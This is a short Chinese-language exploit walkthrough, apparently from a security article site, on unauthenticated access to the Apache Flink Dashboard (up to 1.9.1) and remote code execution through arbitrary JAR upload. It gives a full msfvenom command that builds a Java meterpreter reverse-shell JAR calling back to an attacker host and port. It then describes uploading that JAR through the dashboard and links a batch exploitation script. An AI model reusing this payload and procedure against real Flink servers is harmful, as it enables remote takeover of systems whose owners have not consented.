Apache_Flink_Dashboard_未授权访问-远程代码命令执行-棉花糖会员站

# Apache Flink Dashboard 未授权访问-远程代码命令执行

==========

一、漏洞简介
————

Apache Flink的任意Jar包上传导致远程代码执行的漏洞

二、漏洞影响
————

\<= 1.9.1(最新版本) 三、复现过程 ------------ ### 1、 msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar

![](/static/qingy/Apache_Flink_Dashboard_未授权访问-远程代码命令执行/img/rId25.png)

### 2、

上传alewong Jar包

![](/static/qingy/Apache_Flink_Dashboard_未授权访问-远程代码命令执行/img/rId27.png)

![](/static/qingy/Apache_Flink_Dashboard_未授权访问-远程代码命令执行/img/rId28.png)

### 批量脚本

https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec

Ps:
当注释掉 if ‘Unable to load requested file’ in str(data):
之后，出现Token为空，或者 Unauthorized request 时候是不存在未授权访问的，而是带授权

文章版权归作者所有，未经允许请勿转载。

THE END

Apache_Flink_Dashboard_未授权访问-远程代码命令执行